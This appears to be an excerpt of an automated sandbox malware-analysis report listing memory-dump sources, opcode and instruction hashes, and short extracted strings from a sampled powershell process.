                                  • Instruction ID: 8df40faa92e1181db8636c460c33b0bf6d1b734222a342009d7b6cc580269477
                                  • Opcode Fuzzy Hash: 08141ff0ca3ae324e6399ac636cbc0c34407fdd0ded03279d2727d36f059ab7d
                                  • Instruction Fuzzy Hash: 5F014478B402159FC704DF98D490AADF771FF8D314B248599D95A9B365CA35EC038B50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9272e25993fd48dca92b2a142fb3d7b4aa061c442752c91e5b84a2de430bb5f7
                                  • Instruction ID: b49df6254bdaa284c6506d2de8ed827acb37db253413b6839fe787556a8419a7
                                  • Opcode Fuzzy Hash: 9272e25993fd48dca92b2a142fb3d7b4aa061c442752c91e5b84a2de430bb5f7
                                  • Instruction Fuzzy Hash: 68F06272405394AEE7108E1ACDC4B63FFA8EB41634F18C55AED485E286C2799845CBB1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc0e526415f07da8d60108fc2628fa9178b92f06ee8993fc1251b70b96348c81
                                  • Instruction ID: 7c054a93561c61d2dd4492e3231b3d94b1678cef62500ce945cc3dbaed9d238e
                                  • Opcode Fuzzy Hash: dc0e526415f07da8d60108fc2628fa9178b92f06ee8993fc1251b70b96348c81
                                  • Instruction Fuzzy Hash: 68F0B235A001099FCB15CB9DD990AEEF7B2FF88324F208159E515A72A1C736AD52CB60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d8ef9648bd9e42ac54411d9ddbf51ed1d0bdd203b5b66061e61d8ab81c7586
                                  • Instruction ID: 6a01d8244060fffae4f392568d6b13bd5271ea0746b2ef4451a9088201f25b63
                                  • Opcode Fuzzy Hash: 67d8ef9648bd9e42ac54411d9ddbf51ed1d0bdd203b5b66061e61d8ab81c7586
                                  • Instruction Fuzzy Hash: 2DF0C9B460D285DFE7128B14D959B50BFF1AF82215B59C0DAC0848F1A3D7779846CB51
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58fb0b6134b1536782d52eaebf3336e404068d6efcc052a37f318afc7b9e6522
                                  • Instruction ID: 588a7f5fd6c1ba3dcbef415371e6b9e4f5b751e560c65921d37c26906c80c583
                                  • Opcode Fuzzy Hash: 58fb0b6134b1536782d52eaebf3336e404068d6efcc052a37f318afc7b9e6522
                                  • Instruction Fuzzy Hash: A8212371614280DFD700EF18DAC0B2ABBA8EB84714F24C6BEE8494B645C339D806C761
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q$4'^q$84#l$84#l$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-3004703813
                                  • Opcode ID: c7b93da50532e56bd083b32f8c0bd60095e48d15be8e472803b31224e96c179f
                                  • Instruction ID: cfb0eb213593da1fcd7e248fede8d0c8e7805efa91563b0889aaf305b859c6a1
                                  • Opcode Fuzzy Hash: c7b93da50532e56bd083b32f8c0bd60095e48d15be8e472803b31224e96c179f
                                  • Instruction Fuzzy Hash: AFC138F1B8020ADFEB258F29C40466ABFE2EF85610F6484EAE805DB255DB31DC45C7B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$84#l$84#l$84#l$84#l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                  • API String ID: 0-1743338168
                                  • Opcode ID: 13e60d6b20d59c3013c30e19f75d14a2ede01f7c60287e15b2ec03a484ca0cb5
                                  • Instruction ID: cc6e99da6652a4f222f54dc74dd7d93c80cc86104a27c41f0b5777c1d2be384a
                                  • Opcode Fuzzy Hash: 13e60d6b20d59c3013c30e19f75d14a2ede01f7c60287e15b2ec03a484ca0cb5
                                  • Instruction Fuzzy Hash: 97A109F1B002199FEB148F68D44466ABBE2FF89314FA484E9E8059F395DB31DD41CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-604858858
                                  • Opcode ID: f045158dbf6c141a69c4c967b163c159c5eda9ea027dcb8fbf402293c5a57936
                                  • Instruction ID: 988fa5577993e5ca96ee7ecd2fa82e183ad447fc61e1a76f2563f0d584af8ab1
                                  • Opcode Fuzzy Hash: f045158dbf6c141a69c4c967b163c159c5eda9ea027dcb8fbf402293c5a57936
                                  • Instruction Fuzzy Hash: C7D16BF1B0421A9FEB254B69941066ABBE2FF85330F9484FAE845CF255DF32C845C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-3512890053
                                  • Opcode ID: 0a6dff96fab3d21f33cf0d420db14ebc119ca00c695eb62d486000c4666b2437
                                  • Instruction ID: 6195cb7203bf0dbf9bf345c01cd48bc449bf33d8f691fab6745b1916d507f573
                                  • Opcode Fuzzy Hash: 0a6dff96fab3d21f33cf0d420db14ebc119ca00c695eb62d486000c4666b2437
                                  • Instruction Fuzzy Hash: 99A138F170420A8FEB254B2998606BBBBE5FF81210F9484FAD945CF295DE35CC85C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                  • API String ID: 0-4251566974
                                  • Opcode ID: 6efc2e59fcfaff16ddd201507fcf860ff8dad61c1b34c970dd11857bb9644de8
                                  • Instruction ID: e4dbbb93ee7a87aad709228efb19535781887b770bd91ef89df73e8a0ce0d704
                                  • Opcode Fuzzy Hash: 6efc2e59fcfaff16ddd201507fcf860ff8dad61c1b34c970dd11857bb9644de8
                                  • Instruction Fuzzy Hash: 056137B1B00109DFDB189F6984006AAFBE2EFC9711F64C4A9E8059F355DB31DD41CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$84#l$d%dq$d%dq$d%dq$tP^q$$^q
                                  • API String ID: 0-2106454715
                                  • Opcode ID: 0f1fe9b7270d337c8768aa1cf209928ac62dc6b4951a84f0a1af8566b4bfc451
                                  • Instruction ID: 27911598ff3106071c0af3b5c8aa899ecdb9c9f360169e26b8ff3e5166e9cff6
                                  • Opcode Fuzzy Hash: 0f1fe9b7270d337c8768aa1cf209928ac62dc6b4951a84f0a1af8566b4bfc451
                                  • Instruction Fuzzy Hash: 2851C1F0A5020ADBEB24CF15C544A6ABFE2FB45750FA884E9E805DB294D731DD80CBB1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                  • API String ID: 0-2923853403
                                  • Opcode ID: 925d301e0b2b7f87fe70a1e5fac4708b94a54b0fcda79f58ec2c4ddff4374879
                                  • Instruction ID: ee018a4df67b18a5546149c3ced6b4f9e5b4c74dd35e2acb0ce773f40974bfcb
                                  • Opcode Fuzzy Hash: 925d301e0b2b7f87fe70a1e5fac4708b94a54b0fcda79f58ec2c4ddff4374879
                                  • Instruction Fuzzy Hash: 27417FF2B0024E9BEB295ABD8400276BBD2EFC5210FA4C5FED6418F295DE36C855C352
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$84#l$d%dq$d%dq$d%dq$tP^q
                                  • API String ID: 0-2176637398
                                  • Opcode ID: 794ff43e3f856e5d14315dab771b57a169a2a26a9f63ae62164b18be53ffdd20
                                  • Instruction ID: 7168c1de8f256b992cef20981b331cf6f231439de80e69080184b830303f4506
                                  • Opcode Fuzzy Hash: 794ff43e3f856e5d14315dab771b57a169a2a26a9f63ae62164b18be53ffdd20
                                  • Instruction Fuzzy Hash: EC31B1F0A80219EFDB18DF59C444A6ABFE2FB88B50F649599E905AB350C731DC41CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$tP^q$tP^q$$^q
                                  • API String ID: 0-1915195031
                                  • Opcode ID: 8c477541f4316438668b343093f9531786add6b2b8c52225f0455be147aa4009
                                  • Instruction ID: f259cd1e86d5294e5621cf3db43feb6c1e3426317b9aafadf0e001edbd1e0719
                                  • Opcode Fuzzy Hash: 8c477541f4316438668b343093f9531786add6b2b8c52225f0455be147aa4009
                                  • Instruction Fuzzy Hash: 0A6137B5B00209DFEB149F699404A6AFBE2EF85710FA4C4E9E8059F391DB31DD41CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                  • API String ID: 0-3997570045
                                  • Opcode ID: 2faec226990154581c64123decc427b812e2e50a332968a9e0aa5f373bceb3fd
                                  • Instruction ID: 626be64ca2004aaad0787cf94ca81d0ef3316d5ac67f5932915e06e95a7f64b1
                                  • Opcode Fuzzy Hash: 2faec226990154581c64123decc427b812e2e50a332968a9e0aa5f373bceb3fd
                                  • Instruction Fuzzy Hash: 8E41C2F0A04606EBFB298E05D444BA9B7A1FB45730F9881E6E8155F294CB31D840CBD2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                  • API String ID: 0-3272787073
                                  • Opcode ID: 3881d461be7e972bd782178c405f124bb7f78a464436ce32513e3315c5b2e25a
                                  • Instruction ID: 5f73b77da5f8f40f309a03fc0cb621f84171d4cbb7b5a90e4f9f8f05acc75705
                                  • Opcode Fuzzy Hash: 3881d461be7e972bd782178c405f124bb7f78a464436ce32513e3315c5b2e25a
                                  • Instruction Fuzzy Hash: B8315CF2B14286CFFB290B649414576FBA1EBD2311BA485FAC8058F214DE31C496C791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (o^q$(o^q$(o^q$(o^q
                                  • API String ID: 0-1978863864
                                  • Opcode ID: 28e793ea4254db67bad06c4316c1c9cf7c624c3119c58db4637eb225b4fb4004
                                  • Instruction ID: d984dcf6163baf0e58f1622b189c0ab104ec4ba722f4ab8a6357bf53af418db0
                                  • Opcode Fuzzy Hash: 28e793ea4254db67bad06c4316c1c9cf7c624c3119c58db4637eb225b4fb4004
                                  • Instruction Fuzzy Hash: CCF114B178430ADFEB148F68D8047BABFA2EF85311F5484AAE815CB291DB31D855C7B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$tP^q$tP^q
                                  • API String ID: 0-2805872942
                                  • Opcode ID: b800019a22a2ff2224d9ae1421a92e3686e45c7131d03763c93526175a0f9e78
                                  • Instruction ID: 7c78c979e94bf97463ac90d5b4ee65d244c4e1af49f1b0e2fe2c69aa24666300
                                  • Opcode Fuzzy Hash: b800019a22a2ff2224d9ae1421a92e3686e45c7131d03763c93526175a0f9e78
                                  • Instruction Fuzzy Hash: B5914AF1B002869FDB189F698844B7ABBE6EF85710F6884AAD805DF395CA31CC45C791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$XY%l$XY%l
                                  • API String ID: 0-2254435231
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$(f%l$(f%l
                                  • API String ID: 0-3942150577
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $^q$$^q$$^q$$^q
                                  • API String ID: 0-2125118731
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$$^q$$^q
                                  • API String ID: 0-2049395529